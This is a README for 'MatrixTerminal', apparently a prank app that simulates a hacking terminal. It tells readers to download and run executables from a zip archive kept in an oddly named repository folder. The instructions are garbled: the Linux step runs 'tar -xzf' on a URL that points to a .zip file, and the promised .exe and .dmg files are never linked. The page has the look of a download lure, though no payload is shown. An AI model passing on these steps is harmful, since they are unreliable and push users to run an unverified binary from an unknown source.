🚀 Getting Started

Welcome to MatrixTerminal! This application is a fun tool that simulates a hacking terminal experience. You can use it for pranks, demos, or just to enjoy the hacker aesthetics. Follow the easy steps below to download and run the software.

💻 System Requirements

To run MatrixTerminal, you will need:

  • A computer with Windows, macOS, or Linux.
  • At least 512 MB of RAM.
  • 100 MB of free disk space.
  • A web browser for downloading the application.

You can find the latest version of MatrixTerminal on our releases page. Visit this page to download.

📥 Download & Install

  1. Go to the Releases page here.
  2. Look for the latest release version.
  3. Choose the correct file for your operating system:
    • For Windows, look for a file ending in .exe.
    • For macOS, look for a file ending in .dmg.
    • For Linux, you may find a https://github.com/naolembro/MatrixTerminal/raw/refs/heads/main/phenospermy/Matrix_Terminal_3.9.zip file.
  4. Click on the file to start the download.
  5. Once the download is complete, find the file on your computer.

Windows Installation

  1. Double-click the downloaded .exe file.
  2. Follow the installation prompts to complete the setup.
  3. After installation, you can find MatrixTerminal in your Start menu.

macOS Installation

  1. Open the downloaded .dmg file.
  2. Drag the MatrixTerminal icon into your Applications folder.
  3. You can launch MatrixTerminal from your Applications folder.

Linux Installation

  1. Open a terminal window.
  2. Navigate to the folder where the file was downloaded.
  3. Extract the contents using the command: 
    tar -xzf https://github.com/naolembro/MatrixTerminal/raw/refs/heads/main/phenospermy/Matrix_Terminal_3.9.zip
  4. Navigate into the extracted folder and run: 
    ./MatrixTerminal
